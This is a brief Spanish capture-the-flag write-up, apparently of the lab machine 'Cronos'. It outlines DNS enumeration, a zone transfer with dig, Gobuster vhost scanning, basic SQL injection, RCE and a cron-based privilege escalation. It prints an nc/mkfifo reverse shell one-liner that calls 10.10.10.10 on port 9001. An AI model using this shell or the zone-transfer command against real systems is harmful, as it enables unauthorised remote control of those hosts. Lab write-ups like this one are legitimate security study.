xerosec
Buscar
K

Cronos

Resumen de la resolución

  • Enumeración de servicio DNS expuesto con nslookup y dig
  • Enumeración de rutas http y subdominios con Gobuster
  • Explotación SQLi básica
  • Reverse shell explotando vulnerabilidad RCE
  • Escalada de privilegios abusando de script php corriendo como tarea Cron en la máquina víctima

Habilidades adquiridas

  • Enumeración de Name Servers con nslookup
nslookup
server <IP>
<IP>
  • Ataque de transferencia de Zona DNS para enumerar subdominios
dig axfr @<IP> <dominio.tld>

Comandos y herramientas destacables

  • Enumeración de subdominios con Gobuster
gobuster vhost -u http://<dominio.tld> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 --no-error
  • Reverse Shell nc mkfifo
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.10.10 9001 >/tmp/f

Walkthrough en YouTube:

Última actualización 1mo ago